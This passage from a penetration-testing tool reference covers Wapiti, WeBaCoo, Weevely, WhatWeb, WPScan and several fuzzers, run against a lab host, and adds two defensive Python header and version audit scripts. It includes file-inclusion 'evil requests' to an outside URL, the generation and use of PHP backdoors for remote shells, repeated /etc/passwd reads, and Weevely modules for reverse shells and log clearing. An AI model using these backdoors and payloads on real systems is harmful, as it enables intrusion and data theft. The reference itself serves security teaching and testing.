--max-parameters MAX URLs and forms having more than MAX input parameters will be erased before attack.
-S FORCE, --scan-force FORCE
Easy way to reduce the number of scanned and attacked URLs. Possible values: paranoid, sneaky, polite, normal,
aggressive, insane
-t SECONDS, --timeout SECONDS
Set timeout for requests
-H HEADER, --header HEADER
Set a custom header to use for every requests
-A AGENT, --user-agent AGENT
Set a custom user-agent to use for every requests
--verify-ssl {0,1} Set SSL check (default is no check)
--color Colorize output
-v LEVEL, --verbose LEVEL
Set verbosity level (0: quiet, 1: normal, 2: verbose)
-f FORMAT, --format FORMAT
Set output format. Supported: json, html (default), txt, xml
-o OUPUT_PATH, --output OUPUT_PATH
Output file or folder
--external-endpoint EXTERNAL_ENDPOINT_URL
Url serving as endpoint for target
--internal-endpoint INTERNAL_ENDPOINT_URL
Url serving as endpoint for attacker
--endpoint ENDPOINT_URL
Url serving as endpoint for both attacker and target
--no-bugreport Don't send automatic bug report when an attack module fails
--version Show program's version number and exit
■ Example
# Log in and save the session cookies to a JSON file
root@kali:~# wapiti-getcookie -u http://192.168.11.4/dvwa/login.php -c cookie.json
Unable to correctly determine your language settings. Using english as default.
Please check your locale settings for internationalization features.
===============================================================
<Cookie PHPSESSID=7bd96fe8ed582842789cc9582969ba0e for 192.168.11.4/>
<Cookie security=high for 192.168.11.4/dvwa>
Choose the form you want to use or enter 'q' to leave :
0) POST http://192.168.11.4/dvwa/login.php (0)
data: username=alice&password=&Login=Login
Enter a number : 0
Please enter values for the following form:
url = http://192.168.11.4/dvwa/login.php
username (alice) : admin
password: password
Login (Login) : Login
<Cookie PHPSESSID=7bd96fe8ed582842789cc9582969ba0e for 192.168.11.4/>
<Cookie security=high for 192.168.11.4/dvwa>
# Scan the web application using the saved cookies
root@kali:~# wapiti -u http://192.168.11.4/dvwa/ -c cookie.json --level 2 --exclude http://192.168.11.4/dvwa/logout.php
Note
========
This scan has been saved in the file /root/.wapiti/scans/192.168.11.4_folder_6175d1a4.db
[*] Wapiti found 40 URLs and forms during the scan
[*] Loading modules:
backup, blindsql, brute_login_form, buster, cookieflags, crlf, csp, csrf, exec, file, htaccess, http_headers, methods, nikto, permanentxss, redirect, shellshock, sql, ssrf, wapp, xss, xxe
[*] Launching module csp
CSP is not set
[*] Launching module http_headers
Checking X-Frame-Options :
X-Frame-Options is not set
Checking X-XSS-Protection :
X-XSS-Protection is not set
Checking X-Content-Type-Options :
X-Content-Type-Options is not set
Checking Strict-Transport-Security :
Strict-Transport-Security is not set
[*] Launching module cookieflags
Checking cookie : PHPSESSID
Secure flag is not set in the cookie : PHPSESSID
Checking cookie : security
HttpOnly flag is not set in the cookie : security
Secure flag is not set in the cookie : security
[*] Launching module exec
[*] Launching module file
---
Possible include() vulnerability in http://192.168.11.4/dvwa/vulnerabilities/fi/ via injection in the parameter page
Evil request:
GET /dvwa/vulnerabilities/fi/?page=https%3A%2F%2Fwapiti3.ovh%2Fe.php HTTP/1.1
Host: 192.168.11.4
---
---
Linux local file disclosure vulnerability in http://192.168.11.4/dvwa/vulnerabilities/fi/ via injection in the parameter page
Evil request:
GET /dvwa/vulnerabilities/fi/?page=%2Fetc%2Fpasswd HTTP/1.1
Host: 192.168.11.4
---
[...]
Report
------
A report has been generated in the file /root/.wapiti/generated_report
Open /root/.wapiti/generated_report/192.168.11.4_11292024_0326.html with a browser to see this report.
Generated HTML report
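The http_headers, csp and cookieflags modules in the Wapiti run above reported five missing response headers and cookies without the Secure and HttpOnly flags. The following added example (not from this page or from Wapiti) performs that same check on a raw HTTP response so the result can be reproduced offline: one constructed response modelled on the DVWA findings, and one constructed hardened response that passes. The header names and flags are the ones Wapiti named; the response bodies, server banner and cookie values are constructed.

```python
"""Added example: audit a raw HTTP/1.1 response for the hardening headers
and cookie flags that Wapiti's csp, http_headers and cookieflags modules
check. Both responses below are constructed for illustration.
"""
from email.parser import Parser
from http.client import HTTPMessage

# Constructed response modelled on the Wapiti findings above: no hardening
# headers, PHPSESSID lacks Secure, the "security" cookie lacks both flags.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.53 (Debian)\r\n"
    "Set-Cookie: PHPSESSID=7bd96fe8ed582842789cc9582969ba0e; path=/; HttpOnly\r\n"
    "Set-Cookie: security=high; path=/dvwa\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "<html>...</html>"
)

# Constructed hardened counterpart: every checked header present, every
# cookie carrying Secure and HttpOnly.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Content-Security-Policy: default-src 'self'\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-XSS-Protection: 0\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Set-Cookie: PHPSESSID=7bd96fe8ed582842789cc9582969ba0e; path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "Set-Cookie: security=high; path=/dvwa; Secure; HttpOnly\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "<html>...</html>"
)

# Headers that Wapiti's csp and http_headers modules look for.
REQUIRED_HEADERS = [
    "Content-Security-Policy",
    "X-Frame-Options",
    "X-XSS-Protection",
    "X-Content-Type-Options",
    "Strict-Transport-Security",
]


def parse_response(raw: str):
    """Split a raw HTTP/1.1 response into its status line and a header map."""
    head, _, _body = raw.partition("\r\n\r\n")
    status_line, _, header_block = head.partition("\r\n")
    headers = Parser(_class=HTTPMessage).parsestr(header_block)
    return status_line, headers


def missing_headers(headers) -> list:
    """Names from REQUIRED_HEADERS that the response does not carry."""
    return [name for name in REQUIRED_HEADERS if headers.get(name) is None]


def cookie_findings(headers) -> dict:
    """Map each Set-Cookie name to the flags it lacks (Secure, HttpOnly)."""
    findings = {}
    for value in headers.get_all("Set-Cookie", []):
        parts = [p.strip() for p in value.split(";")]
        name = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        findings[name] = [flag for flag in ("Secure", "HttpOnly") if flag.lower() not in attrs]
    return findings


def audit(raw: str) -> dict:
    """Return the missing headers and per-cookie missing flags for a response."""
    _status, headers = parse_response(raw)
    return {"missing_headers": missing_headers(headers), "cookies": cookie_findings(headers)}


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        result = audit(raw)
        print(f"== {label} ==")
        for name in result["missing_headers"]:
            print(f"{name} is not set")
        for cookie, flags in result["cookies"].items():
            for flag in flags:
                print(f"{flag} flag is not set in the cookie : {cookie}")
```

The weak response reproduces the Wapiti lines verbatim (five headers missing, Secure missing on PHPSESSID, both flags missing on security); the hardened one produces no findings. X-XSS-Protection is kept in the list only because Wapiti reports on it; current browsers no longer act on it, and the value 0 shown above is the form that disables the legacy filter rather than relying on it.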
WeBaCoo
Generates PHP backdoor scripts and interacts with them.
■ Usage
root@kali:~# webacoo -h
Usage: webacoo [options]
Options:
-g Generate backdoor code (-o is required)
-f FUNCTION PHP System function to use
FUNCTION
1: system (default)
2: shell_exec
3: exec
4: passthru
5: popen
-o OUTPUT Generated backdoor output filename
-r Return un-obfuscated backdoor code
-t Establish remote "terminal" connection (-u is required)
-u URL Backdoor URL
-e CMD Single command execution mode (-t and -u are required)
-m METHOD HTTP method to be used (default is GET)
-c C_NAME Cookie name (default: "M-cookie")
-d DELIM Delimiter (default: New random for each request)
-a AGENT HTTP header user-agent (default exist)
-p PROXY Use proxy (tor, ip:port or user:pass:ip:port)
-v LEVEL Verbose level
LEVEL
0: no additional info (default)
1: print HTTP headers
2: print HTTP headers + data
-l LOG Log activity to file
-h Display help and exit
update Check for updates and apply if any
■ Example
# Create the backdoor script
root@kali_1:~# webacoo -g -o backdoor.php
[+] Backdoor file "backdoor.php" created.
# Place the created backdoor script on the target host and connect to it
root@kali_1:~# webacoo -t -u http://192.168.11.4/backdoor.php
[+] Connecting to remote server as...
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Type 'load' to use an extension module.
[*] Type ':<cmd>' to run local OS commands.
[*] Type 'exit' to quit terminal.
# Run a command on the target host
webacoo$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
[...]
Weevely
Generates PHP backdoor scripts and interacts with them.
■ Usage
root@kali_1:~# man weevely
SYNOPSIS
Run terminal to the target
weevely <URL> <password> [cmd]
Generate backdoor agent
weevely generate <password> <path>
Load session file
weevely session <path>
Modules
Module Description
──────────────────────────────────────────────────────────────────────────
:audit_filesystem Audit the file system for weak permissions.
:audit_suidsgid Find files with SUID or SGID flags.
:audit_disablefunctionbypass Bypass disable_function restrictions with mod_cgi and .htaccess.
:audit_etcpasswd Read /etc/passwd with different techniques.
:audit_phpconf Audit PHP configuration.
:shell_sh Execute shell commands.
:shell_su Execute commands with su.
:shell_php Execute PHP commands.
:system_extensions Collect PHP and webserver extension list.
:system_info Collect system information.
:system_procs List running processes.
:backdoor_reversetcp Execute a reverse TCP shell.
:backdoor_tcp Spawn a shell on a TCP port.
:backdoor_meterpreter Start a meterpreter session.
:bruteforce_sql Bruteforce SQL database.
:file_gzip Compress or expand gzip files.
:file_clearlog Remove string from a file.
:file_check Get attributes and permissions of a file.
:file_upload Upload file to remote filesystem.
:file_webdownload Download an URL.
:file_tar Compress or expand tar archives.
:file_download Download file from remote filesystem.
:file_bzip2 Compress or expand bzip2 files.
:file_edit Edit remote file on a local editor.
:file_grep Print lines matching a pattern in multiple
files.
:file_ls List directory content.
:file_cp Copy single file.
:file_rm Remove remote file.
:file_upload2web Upload file automatically to a web folder
and get corresponding URL.
:file_zip Compress or expand zip files.
:file_touch Change file timestamp.
:file_find Find files with given names and attributes.
:file_mount Mount remote filesystem using HTTPfs.
:file_enum Check existence and permissions of a list
of paths.
:file_read Read remote file from the remote filesystem.
:file_cd Change current working directory.
:sql_console Execute SQL query or run console.
:sql_dump Multi dbms mysqldump replacement.
:net_mail Send mail.
:net_phpproxy Install PHP proxy on the target.
:net_curl Perform a curl-like HTTP request.
:net_proxy Run local proxy to pivot HTTP/HTTPS browsing through the target.
:net_scan TCP Port scan.
:net_ifconfig Get network interfaces addresses.
■ Example
# Create the backdoor script
root@kali_1:~# weevely generate hello backdoor.php
Generated 'backdoor.php' with password 'hello' of 692 byte size.
# Place the created backdoor script on the target host and connect to it
root@kali_1:~# weevely http://192.168.11.4/backdoor.php hello
[+] weevely 4.0.1
[+] Target: 192.168.11.4
[+] Session: /root/.weevely/sessions/192.168.11.4/backdoor_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
# Run a command on the target host
www-data@kali_2:/var/www/html $ :shell_sh cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
[...]
WhatWeb
Scans a web application to identify the technology stack it is built on.
■ Usage
root@kali:~# whatweb --help
Usage: whatweb [options] <URLs>
TARGET SELECTION:
<TARGETs> Enter URLs, hostnames, IP addresses, filenames or
IP ranges in CIDR, x.x.x-x, or x.x.x.x-x.x.x.x
format.
--input-file=FILE, -i Read targets from a file. You can pipe
hostnames or URLs directly with -i /dev/stdin.
TARGET MODIFICATION:
--url-prefix Add a prefix to target URLs.
--url-suffix Add a suffix to target URLs.
--url-pattern Insert the targets into a URL.
e.g. example.com/%insert%/robots.txt
AGGRESSION:
The aggression level controls the trade-off between speed/stealth and
reliability.
--aggression, -a=LEVEL Set the aggression level. Default: 1.
1. Stealthy Makes one HTTP request per target and also
follows redirects.
3. Aggressive If a level 1 plugin is matched, additional
requests will be made.
4. Heavy Makes a lot of HTTP requests per target. URLs
from all plugins are attempted.
HTTP OPTIONS:
--user-agent, -U=AGENT Identify as AGENT instead of WhatWeb/0.5.5.
--header, -H Add an HTTP header. eg "Foo:Bar". Specifying a
default header will replace it. Specifying an
empty value, e.g. "User-Agent:" will remove it.
--follow-redirect=WHEN Control when to follow redirects. WHEN may be
'never', 'http-only', 'meta-only', 'same-site',
or 'always'. Default: always.
--max-redirects=NUM Maximum number of redirects. Default: 10.
AUTHENTICATION:
--user, -u=<user:password> HTTP basic authentication.
--cookie, -c=COOKIES Use cookies, e.g. 'name=value; name2=value2'.
--cookie-jar=FILE Read cookies from a file.
PROXY:
--proxy <hostname[:port]> Set proxy hostname and port.
Default: 8080.
--proxy-user <username:password> Set proxy user and password.
PLUGINS:
--list-plugins, -l List all plugins.
--info-plugins, -I=[SEARCH] List all plugins with detailed information.
Optionally search with keywords in a comma
delimited list.
--search-plugins=STRING Search plugins for a keyword.
--plugins, -p=LIST Select plugins. LIST is a comma delimited set
of selected plugins. Default is all.
Each element can be a directory, file or plugin
name and can optionally have a modifier, +/-.
Examples: +/tmp/moo.rb,+/tmp/foo.rb
title,md5,+./plugins-disabled/
./plugins-disabled,-md5
-p + is a shortcut for -p +plugins-disabled.
--grep, -g=STRING|REGEXP Search for STRING or a Regular Expression. Shows
only the results that match.
Examples: --grep "hello"
--grep "/he[l]*o/"
--custom-plugin=DEFINITION Define a custom plugin named Custom-Plugin,
Examples: ":text=>'powered by abc'"
":version=>/powered[ ]?by ab[0-9]/"
":ghdb=>'intitle:abc \"powered by abc\"'"
":md5=>'8666257030b94d3bdb46e05945f60b42'"
"{:text=>'powered by abc'}"
--dorks=PLUGIN List Google dorks for the selected plugin.
OUTPUT:
--verbose, -v Verbose output includes plugin descriptions.
Use twice for debugging.
--colour,--color=WHEN control whether colour is used. WHEN may be
'never', 'always', or 'auto'.
--quiet, -q Do not display brief logging to STDOUT.
--no-errors Suppress error messages.
LOGGING:
--log-brief=FILE Log brief, one-line output.
--log-verbose=FILE Log verbose output.
--log-errors=FILE Log errors.
--log-xml=FILE Log XML format.
--log-json=FILE Log JSON format.
--log-sql=FILE Log SQL INSERT statements.
--log-sql-create=FILE Create SQL database tables.
--log-json-verbose=FILE Log JSON Verbose format.
--log-magictree=FILE Log MagicTree XML format.
--log-object=FILE Log Ruby object inspection format.
--log-mongo-database Name of the MongoDB database.
--log-mongo-collection Name of the MongoDB collection.
Default: whatweb.
--log-mongo-host MongoDB hostname or IP address.
Default: 0.0.0.0.
--log-mongo-username MongoDB username. Default: nil.
--log-mongo-password MongoDB password. Default: nil.
--log-elastic-index Name of the index to store results. Default: whatweb
--log-elastic-host Host:port of the elastic http interface. Default: 127.0.0.1:9200
PERFORMANCE & STABILITY:
--max-threads, -t Number of simultaneous threads. Default: 25.
--open-timeout Time in seconds. Default: 15.
--read-timeout Time in seconds. Default: 30.
--wait=SECONDS Wait SECONDS between connections.
This is useful when using a single thread.
HELP & MISCELLANEOUS:
--short-help Short usage help.
--help, -h Complete usage help.
--debug Raise errors in plugins.
--version Display version information.
■ Example
root@kali:~# whatweb http://192.168.11.4
http://192.168.11.4 [200 OK] Apache, Country[RESERVED][ZZ], HTML5, HTTPServer[Apache], IP[192.168.11.4], JQuery, MetaGenerator[WordPress 5.2.21], PHP[7.2.34], Script[text/javascript], Title[Hello World], UncommonHeaders[link], WordPress[5.2.21], X-Powered-By[PHP/7.2.34], x-pingback[http://192.168.11.4/wp/xmlrpc.php]
WPScan
Performs a security scan of sites built with WordPress.
■ Usage
root@kali:~# wpscan --help
Usage: wpscan [options]
--url URL The URL of the blog to scan
Allowed Protocols: http, https
Default Protocol if none provided: http
This option is mandatory unless update or help or hh or version is/are supplied
-h, --help Display the simple help and exit
--hh Display the full help and exit
--version Display the version and exit
-v, --verbose Verbose mode
--[no-]banner Whether or not to display the banner
Default: true
-o, --output FILE Output to FILE
-f, --format FORMAT Output results in the format supplied
Available choices: json, cli-no-colour, cli-no-color, cli
--detection-mode MODE Default: mixed
Available choices: mixed, passive, aggressive
--user-agent, --ua VALUE
--random-user-agent, --rua Use a random user-agent for each scan
--http-auth login:password
-t, --max-threads VALUE The max threads to use
Default: 5
--throttle MilliSeconds Milliseconds to wait before doing another web request. If used, the max threads will be set to 1.
--request-timeout SECONDS The request timeout in seconds
Default: 60
--connect-timeout SECONDS The connection timeout in seconds
Default: 30
--disable-tls-checks Disables SSL/TLS certificate verification, and downgrade to TLS1.0+ (requires cURL 7.66 for the latter)
--proxy protocol://IP:port Supported protocols depend on the cURL installed
--proxy-auth login:password
--cookie-string COOKIE Cookie string to use in requests, format: cookie1=value1[; cookie2=value2]
--cookie-jar FILE-PATH File to read and write cookies
Default: /tmp/wpscan/cookie_jar.txt
--force Do not check if the target is running WordPress or returns a 403
--[no-]update Whether or not to update the Database
--api-token TOKEN The WPScan API Token to display vulnerability data, available at https://wpscan.com/profile
--wp-content-dir DIR The wp-content directory if custom or not detected, such as "wp-content"
--wp-plugins-dir DIR The plugins directory if custom or not detected, such as "wp-content/plugins"
-e, --enumerate [OPTS] Enumeration Process
Available Choices:
vp Vulnerable plugins
ap All plugins
p Popular plugins
vt Vulnerable themes
at All themes
t Popular themes
tt Timthumbs
cb Config backups
dbe Db exports
u User IDs range. e.g: u1-5
Range separator to use: '-'
Value if no argument supplied: 1-10
m Media IDs range. e.g m1-15
Note: Permalink setting must be set to "Plain" for those to be detected
Range separator to use: '-'
Value if no argument supplied: 1-100
Separator to use between the values: ','
Default: All Plugins, Config Backups
Value if no argument supplied: vp,vt,tt,cb,dbe,u,m
Incompatible choices (only one of each group/s can be used):
- vp, ap, p
- vt, at, t
--exclude-content-based REGEXP_OR_STRING Exclude all responses matching the Regexp (case insensitive) during parts of the enumeration.
Both the headers and body are checked. Regexp delimiters are not required.
--plugins-detection MODE Use the supplied mode to enumerate Plugins.
Default: passive
Available choices: mixed, passive, aggressive
--plugins-version-detection MODE Use the supplied mode to check plugins' versions.
Default: mixed
Available choices: mixed, passive, aggressive
--exclude-usernames REGEXP_OR_STRING Exclude usernames matching the Regexp/string (case insensitive). Regexp delimiters are not required.
-P, --passwords FILE-PATH List of passwords to use during the password attack.
If no --username/s option supplied, user enumeration will be run.
-U, --usernames LIST List of usernames to use during the password attack.
Examples: 'a1', 'a1,a2,a3', '/tmp/a.txt'
--multicall-max-passwords MAX_PWD Maximum number of passwords to send by request with XMLRPC multicall
Default: 500
--password-attack ATTACK Force the supplied attack to be used rather than automatically determining one.
Multicall will only work against WP < 4.4
Available choices: wp-login, xmlrpc, xmlrpc-multicall
--login-uri URI The URI of the login page if different from /wp-login.php
--stealthy Alias for --random-user-agent --detection-mode passive --plugins-version-detection passive
■ Example
root@kali:~# wpscan --url http://192.168.11.4
[+] URL: http://192.168.11.4/ [192.168.11.4]
[+] Started: Sun Dec 1 09:32:26 2024
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.53 (Debian)
| - X-Powered-By: PHP/7.4.28
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.11.4/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.11.4/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.11.4/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.9.3 identified (Insecure, released on 2022-04-05).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.11.4/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.9.3'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.11.4/, Match: 'WordPress 5.9.3'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Dec 1 09:32:29 2024
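The version line in the report above comes from two passive sources: the `?ver=` query string on the emoji script and the generator meta tag. As an added example (not wpscan's own code, and run against constructed HTML rather than the scanned host), this Python function performs the same two matches and reports them the way wpscan does, so a site owner can confirm both leaks are gone after hardening:

```python
"""Passive WordPress version fingerprint, in the manner of wpscan's
"Emoji Settings" and "Meta Generator" checks.

Added example, not wpscan's code. Both HTML documents below are constructed
for this example; nothing here was captured from the scanned host.
"""
import re

# Constructed page that leaks the version in two places, as in the report.
SAMPLE_HTML = """<!DOCTYPE html><html><head>
<meta name="generator" content="WordPress 5.9.3" />
<script src="http://192.168.11.4/wp-includes/js/wp-emoji-release.min.js?ver=5.9.3" id="wp-emoji-js"></script>
</head><body><p>Hello</p></body></html>
"""

# Constructed page after hardening (generator tag and emoji script removed).
HARDENED_HTML = "<!DOCTYPE html><html><head><title>x</title></head><body></body></html>"

# Same evidence wpscan printed as "Match:" above.
EMOJI_RE = re.compile(r"wp-includes/js/wp-emoji-release\.min\.js\?ver=(\d+(?:\.\d+)*)")
META_RE = re.compile(
    r'<meta[^>]+name=["\']generator["\'][^>]+content=["\']WordPress (\d+(?:\.\d+)*)',
    re.IGNORECASE,
)


def passive_wp_version(html):
    """Return a dict with the detected version and the sources that matched.

    The first matching source plays the role of wpscan's "Found By", any
    further agreeing source of "Confirmed By". If the sources disagree, no
    version is reported and "conflict" is set instead of guessing.
    """
    evidence = []
    for name, rx in (("Emoji Settings", EMOJI_RE), ("Meta Generator", META_RE)):
        m = rx.search(html)
        if m:
            evidence.append((name, m.group(1)))
    if not evidence:
        return {"version": None, "found_by": [], "confirmed": False, "conflict": False}
    versions = {v for _, v in evidence}
    return {
        "version": evidence[0][1] if len(versions) == 1 else None,
        "found_by": [n for n, _ in evidence],
        "confirmed": len(evidence) > 1 and len(versions) == 1,
        "conflict": len(versions) > 1,
    }


if __name__ == "__main__":
    for label, html in (("leaking page", SAMPLE_HTML), ("hardened page", HARDENED_HTML)):
        print(label, "->", passive_wp_version(html))
```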
Fuzzing
BED (Bruteforce Exploit Detector)
A fuzzing tool that checks software for potential vulnerabilities such as buffer overflows and format string bugs.
■ Usage
root@kali:~# bed --help
Usage:
bed -s <plugin> -t <target> -p <port> -o <timeout> [ depends on the plugin ]
<plugin> = FTP/SMTP/POP/HTTP/IRC/IMAP/PJL/LPD/FINGER/SOCKS4/SOCKS5
<target> = Host to check (default: localhost)
<port> = Port to connect to (default: standard port)
<timeout> = seconds to wait after each test (default: 2 seconds)
use "bed -s <plugin>" to obtain the parameters you need for the plugin.
Only -s is a mandatory switch.
■ Usage example
# Run a fuzzing test against the SMTP service
root@kali:~# bed -s smtp -t 192.168.11.4 -u hello@localhost
* Normal tests
+ Buffer overflow testing:
testing: 1 EXPN XAXAX ...........
testing: 2 EHLO XAXAX ...........
testing: 3 MAIL FROM: XAXAX ...........
[...]
+ Formatstring testing:
testing: 1 EXPN XAXAX .......
testing: 2 EHLO XAXAX .......
testing: 3 MAIL FROM: XAXAX
[...]
+ Unicode testing:
testing: 1 EXPN XAXAX .......
testing: 2 EHLO XAXAX .......
testing: 3 MAIL FROM: XAXAX .......
[...]
Doona
A fuzzing tool that checks software for potential vulnerabilities such as buffer overflows and format string bugs. It was created as a fork of BED and adds a number of improvements.
■ Usage
root@kali:~# doona --help
Usage: doona.pl [-OPTIONS [-MORE_OPTIONS]] [--] [PROGRAM_ARG1 ...]
The following single-character options are accepted:
With arguments: -m -s -t -o -p -r -u -v -w -x -M -c
Boolean (without arguments): -d -h -k
Options may be merged together. -- stops processing of options.
Space is not required between options and their arguments.
[Now continuing due to backward compatibility and excessive paranoia.
See 'perldoc Getopt::Std' about $Getopt::Std::STANDARD_HELP_VERSION.]
Usage:
./doona.pl -m [module] <options>
-m <module> = DICT/FINGER/FTP/HTTP/HTTP_MORE/HTTP_SP/HTTP_WEBDAV/IMAP/IRC/LPD/NNTP/PJL/POP/PROXY/RTSP/SMTP/SOCKS4/SOCKS5/TFTP/WHOIS
-c <int> = Execute a health check after every <int> fuzz cases
-t <target> = Host to check (default: localhost)
-p <port> = Port to connect to (default: module specific standard port)
-o <timeout> = seconds to wait after each test (default: 2 seconds)
-r <index> = Resumes fuzzing at test case index
-k = Keep trying until server passes a health check
-d = Dump test case to stdout (use in combination with -r)
-M <num> = Exit after executing <num> number of fuzz cases
-h = Help (this text)
use "./doona.pl -m [module] -h" for module specific option.
■ Usage example
root@kali:~# doona -m HTTP -t 192.168.11.4 -o 0
+ Buffer overflow testing
1/39 [XAXAX] ............................................. (45)
2/39 [XAXAX / HTTP/1.0] ............................................. (90)
3/39 [HEAD XAXAX HTTP/1.0] ............................................. (135)
4/39 [HEAD /XAXAX HTTP/1.0] ............................................. (180)
5/39 [HEAD /?XAXAX HTTP/1.0] ............................................. (225)
[...]
+ Formatstring testing
1/39 [XAXAX] ........... (1766)
2/39 [XAXAX / HTTP/1.0] ........... (1777)
3/39 [HEAD XAXAX HTTP/1.0] ........... (1788)
4/39 [HEAD /XAXAX HTTP/1.0] ........... (1799)
5/39 [HEAD /?XAXAX HTTP/1.0] ........... (1810)
[...]
+ Buffer overflow testing
1/532 GET / HTTP/1.0 [XAXAX: XAXAX] ............................................. (2229)
2/532 GET / HTTP/1.0 [User-Agent: XAXAX] ............................................. (2274)
3/532 GET / HTTP/1.0 [Host: XAXAX] ............................................. (2319)
4/532 GET / HTTP/1.0 [Host: XAXAX:80] ............................................. (2364)
5/532 GET / HTTP/1.0 [Host: somehost:XAXAX] ............................................. (2409)
[...]
ffuf
Performs directory discovery and fuzzing of GET/POST parameters.
■ Usage
root@kali:~# ffuf --help
HTTP OPTIONS:
-H Header `"Name: Value"`, separated by colon. Multiple -H flags are accepted.
-X HTTP method to use
-b Cookie data `"NAME1=VALUE1; NAME2=VALUE2"` for copy as curl functionality.
-cc Client cert for authentication. Client key needs to be defined as well for this to work
-ck Client key for authentication. Client certificate needs to be defined as well for this to work
-d POST data
-http2 Use HTTP2 protocol (default: false)
-ignore-body Do not fetch the response content. (default: false)
-r Follow redirects (default: false)
-raw Do not encode URI (default: false)
-recursion Scan recursively. Only FUZZ keyword is supported, and URL (-u) has to end in it. (default: false)
-recursion-depth Maximum recursion depth. (default: 0)
-recursion-strategy Recursion strategy: "default" for a redirect based, and "greedy" to recurse on all matches (default: default)
-replay-proxy Replay matched requests using this proxy.
-sni Target TLS SNI, does not support FUZZ keyword
-timeout HTTP request timeout in seconds. (default: 10)
-u Target URL
-x Proxy URL (SOCKS5 or HTTP). For example: http://127.0.0.1:8080 or socks5://127.0.0.1:8080
GENERAL OPTIONS:
-V Show version information. (default: false)
-ac Automatically calibrate filtering options (default: false)
-acc Custom auto-calibration string. Can be used multiple times. Implies -ac
-ach Per host autocalibration (default: false)
-ack Autocalibration keyword (default: FUZZ)
-acs Custom auto-calibration strategies. Can be used multiple times. Implies -ac
-c Colorize output. (default: false)
-config Load configuration from a file
-json JSON output, printing newline-delimited JSON records (default: false)
-maxtime Maximum running time in seconds for entire process. (default: 0)
-maxtime-job Maximum running time in seconds per job. (default: 0)
-noninteractive Disable the interactive console functionality (default: false)
-p Seconds of `delay` between requests, or a range of random delay. For example "0.1" or "0.1-2.0"
-rate Rate of requests per second (default: 0)
-s Do not print additional information (silent mode) (default: false)
-sa Stop on all error cases. Implies -sf and -se. (default: false)
-scraperfile Custom scraper file path
-scrapers Active scraper groups (default: all)
-se Stop on spurious errors (default: false)
-search Search for a FFUFHASH payload from ffuf history
-sf Stop when > 95% of responses return 403 Forbidden (default: false)
-t Number of concurrent threads. (default: 40)
-v Verbose output, printing full URL and redirect location (if any) with the results. (default: false)
MATCHER OPTIONS:
-mc Match HTTP status codes, or "all" for everything. (default: 200-299,301,302,307,401,403,405,500)
-ml Match amount of lines in response
-mmode Matcher set operator. Either of: and, or (default: or)
-mr Match regexp
-ms Match HTTP response size
-mt Match how many milliseconds to the first response byte, either greater or less than. EG: >100 or <100
-mw Match amount of words in response
FILTER OPTIONS:
-fc Filter HTTP status codes from response. Comma separated list of codes and ranges
-fl Filter by amount of lines in response. Comma separated list of line counts and ranges
-fmode Filter set operator. Either of: and, or (default: or)
-fr Filter regexp
-fs Filter HTTP response size. Comma separated list of sizes and ranges
-ft Filter by number of milliseconds to the first response byte, either greater or less than. EG: >100 or <100
-fw Filter by amount of words in response. Comma separated list of word counts and ranges
INPUT OPTIONS:
-D DirSearch wordlist compatibility mode. Used in conjunction with -e flag. (default: false)
-e Comma separated list of extensions. Extends FUZZ keyword.
-enc Encoders for keywords, eg. 'FUZZ:urlencode b64encode'
-ic Ignore wordlist comments (default: false)
-input-cmd Command producing the input. --input-num is required when using this input method. Overrides -w.
-input-num Number of inputs to test. Used in conjunction with --input-cmd. (default: 100)
